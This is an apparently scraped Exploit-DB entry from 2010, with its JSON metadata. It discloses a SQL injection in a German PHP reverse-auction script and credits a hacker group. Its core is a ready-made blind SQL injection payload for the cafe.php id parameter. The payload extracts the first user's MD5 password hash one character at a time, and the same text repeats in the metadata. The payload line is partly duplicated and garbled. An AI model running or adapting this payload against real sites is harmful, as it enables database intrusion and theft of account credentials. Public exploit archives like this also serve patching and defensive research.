ID EDB-ID:12535
Type exploitdb
Reporter Easy Laster
Modified 2010-05-08T00:00:00
Description
phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection. Webapps exploit for php platform
----------------------------Information------------------------------------------------
+Name : phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection Vulnerability
+Autor : Easy Laster
+ICQ : 11-051-551
+Date : 08.05.2010
+Script : phpscripte24 Countdown Standart Rückwärts Auktions System
+Download : -----------
+Price : € 159.99
+Language :PHP
+Discovered by Easy Laster 4004-security-project.com
+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.
---------------------------------------------------------------------------------------
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
----------------------------------------------------------------------------------------
+Vulnerability : [site]/auktion/cafe.php?id=
#password md5
+Exploitable : [site]/auktion/cafe.php?id=cafe.php?id=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
----------------------------------------------------------------------------------------
{"published": "2010-05-08T00:00:00", "id": "EDB-ID:12535", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "1065b83114f9bc87d7cf1294c7622be5e7f1ea78ae0db06469b9470d05dd6e14", "description": "phpscripte24 Countdown Standart R\u00fcckw\u00e4rts Auktions System SQL Injection. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/12535/", "lastseen": "2016-02-01T16:43:57", "edition": 1, "title": "phpscripte24 Countdown Standart R\u00fcckw\u00e4rts Auktions System - SQL Injection", "osvdbidlist": [], "modified": "2010-05-08T00:00:00", "bulletinFamily": "exploit", "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/12535/", "references": [], "reporter": "Easy Laster", "sourceData": "----------------------------Information------------------------------------------------\r\n+Name : phpscripte24 Countdown Standart R\u00fcckw\u00e4rts Auktions System SQL Injection Vulnerability\r\n+Autor : Easy Laster\r\n+ICQ : 11-051-551\r\n+Date : 08.05.2010\r\n+Script : phpscripte24 Countdown Standart R\u00fcckw\u00e4rts Auktions System\r\n+Download : -----------\r\n+Price : \u20ac 159.99 \r\n+Language :PHP\r\n+Discovered by Easy Laster 4004-security-project.com\r\n+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com\r\n+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,\r\nKiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,\r\nN00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.\r\n \r\n---------------------------------------------------------------------------------------\r\n \r\n ___ ___ ___ ___ _ _ _____ _ _ \r\n| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_\r\n|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|\r\n |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|\r\n |___| |___| \r\n \r\n \r\n----------------------------------------------------------------------------------------\r\n+Vulnerability : [site]/auktion/cafe.php?id=\r\n#password md5\r\n+Exploitable : [site]/auktion/cafe.php?id=cafe.php?id=1+and+1=1+and+ascii\r\n(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1\r\n----------------------------------------------------------------------------------------\r\n", "objectVersion": "1.0"}
{"result": {}}